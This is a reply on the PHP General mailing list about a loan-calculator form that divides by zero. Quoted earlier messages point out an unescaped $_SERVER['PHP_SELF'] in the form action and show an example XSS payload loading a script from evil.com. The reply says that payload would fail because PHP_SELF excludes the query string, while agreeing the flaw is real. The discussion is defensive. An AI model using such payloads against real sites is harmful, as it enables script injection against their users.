On Wed, Mar 10, 2010 at 22:27, Jochem Maas <joc...@iamjochem.com> wrote: > Op 3/10/10 6:23 PM, Joseph Thayne schreef: >> Looks to me like you are closing your form before you put anything in >> it. Therefore, the loan_amount is not set making the value 0. Follow >> the math, and you are dividing by 1-1. >> >> Change this line: >> >> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form> >> >> to: >> >> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> > > this is a XSS waiting to happen. I can put something like the following in > the request uri: > > index.php?" onsubmit="evil()"><script > src="http://www.evil.com/evi.js";></script> > > with regard to the original problem - some input validation is in order.
PHP_SELF doesn't contain the query string, so your particular attack wouldn't work. It's still a security issue though. -- Daniel Egeberg -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
